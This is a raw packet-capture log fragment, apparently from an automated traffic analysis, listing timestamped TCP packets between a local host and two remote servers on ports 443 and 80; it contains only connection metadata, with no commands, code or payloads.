                                                            Dec 2, 2024 09:18:16.050729036 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.053231955 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.053277016 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.053283930 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.053317070 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.056585073 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.056642056 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.056648016 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.086081982 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.086134911 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.086142063 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.131069899 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.195950031 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.195957899 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.196005106 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.196012020 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.196060896 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.219836950 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.219845057 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.219903946 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.219912052 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.223186016 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.223218918 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.223243952 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.223252058 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.223273993 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.225766897 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.225824118 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.225831032 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.228487015 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.228544950 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.228552103 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.231926918 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.231985092 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.231993914 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.234546900 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.234615088 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.234621048 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.237262011 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.237317085 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.237323999 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.240648031 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.240706921 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.240714073 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.243331909 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.243386984 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.243392944 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.245995998 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.246052027 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.246058941 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.246073961 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.249958992 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.250017881 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.250024080 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.253078938 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.253132105 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.253138065 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.255814075 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.255870104 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.255877018 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.285171032 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.285232067 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.285243988 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.334207058 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.395220041 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.395227909 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.395286083 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.395286083 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.395334005 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.418998957 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.419007063 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.419063091 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.419074059 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.420996904 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.421006918 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.421058893 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.421068907 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.424391985 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.424449921 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.424448013 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.424473047 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.424494028 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.426987886 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.427046061 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.446850061 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.446958065 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.446964025 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.449449062 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.449691057 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.449696064 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.452824116 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.452940941 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.452946901 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.455831051 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.455960035 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.455967903 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.458594084 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.458765984 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.458771944 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.461177111 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.461488962 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.461496115 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.464585066 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.464740038 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.464751005 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.492578030 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.492691040 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.492697954 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.537391901 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.605353117 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.605360985 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.605591059 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.605598927 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.627846003 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.627918959 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.627926111 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.630601883 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.630631924 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.630655050 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.630661964 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.630690098 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.633261919 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.633348942 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.633354902 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.636590958 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.636729002 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.636735916 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.639305115 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.639410973 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.639416933 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.642680883 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.642851114 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.642858982 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.645328045 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.645654917 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.645662069 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.648176908 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.648303032 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.648309946 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.651401043 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.651518106 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.651525974 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.653999090 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.654088020 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.654093981 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.656797886 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.656905890 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.656912088 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.660109043 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.660180092 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.660187006 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.663147926 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.663216114 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.663223028 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.665803909 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.665931940 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.665939093 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.693825006 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.693933010 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.693945885 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.740453005 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.806473970 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.806480885 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.806544065 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.806557894 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.829185009 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.829241991 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.829258919 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.832600117 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.832637072 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.832655907 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.832664013 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.832678080 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.834299088 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.834348917 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.834353924 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.834378958 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.834425926 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.837846994 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:32.479346037 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:32.599337101 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:32.599550009 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:32.599550962 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:32.719505072 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.752301931 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.752322912 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.752334118 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.752438068 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.752460003 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.752473116 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.752485037 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.752496004 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.752511024 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.752525091 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.752722979 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.752758980 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.752767086 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.752772093 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.752804995 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.872441053 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.872538090 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.872685909 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.876595974 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.928265095 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.953433990 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.953490019 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.953563929 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.955888033 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.955991030 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.956134081 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.964308023 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.964405060 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.964462996 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.970812082 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.970910072 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.970953941 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.979228973 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.979357004 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.979406118 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.987689018 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.987765074 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.987811089 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.996069908 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.996160984 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.996218920 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.004425049 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.004535913 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.004591942 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.013149023 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.013322115 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.013379097 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.021230936 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.021334887 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.021384954 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.048230886 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.048249006 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.048415899 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.073501110 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.073606968 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.073656082 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.077724934 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.131294012 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.154874086 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.155057907 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.155117989 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.157350063 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.157459974 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.157522917 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.162410021 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.162545919 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.162595034 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.167252064 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.167361021 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.167418003 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.172234058 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.172352076 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.172405005 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.177194118 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.177371979 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.177421093 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.182135105 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.182249069 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.182297945 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.187107086 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.187252045 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.187300920 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.192064047 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.192187071 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.192234993 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.197068930 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.197170973 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.197221041 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.201999903 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.202137947 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.202184916 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.207007885 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.207106113 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.207165003 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.210766077 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.210896015 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.210943937 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.214585066 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.214687109 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.214725971 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.218415976 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.218538046 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.218585968 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.222305059 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.222426891 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.222477913 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.226073027 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.226197004 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.226243973 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.229896069 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.230005980 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.230084896 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.233726025 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.233839035 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.233887911 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.237534046 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.237700939 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.237746954 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.241416931 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.241548061 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.759414911 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.759506941 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.759630919 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.760049105 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.760164976 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.760245085 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.761163950 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.761234999 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.761311054 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.762392998 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.762432098 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.762505054 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.763714075 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.763823986 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.763899088 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.764998913 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.765101910 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.765175104 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.766297102 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.766417027 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.766488075 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.767594099 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.767680883 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.767750978 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.768829107 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.768964052 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.769036055 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.770101070 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.770230055 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.770299911 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.771322012 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.771439075 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.771502018 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.772598982 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.772715092 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.772804022 CET4973980192.168.2.4172.245.123.12
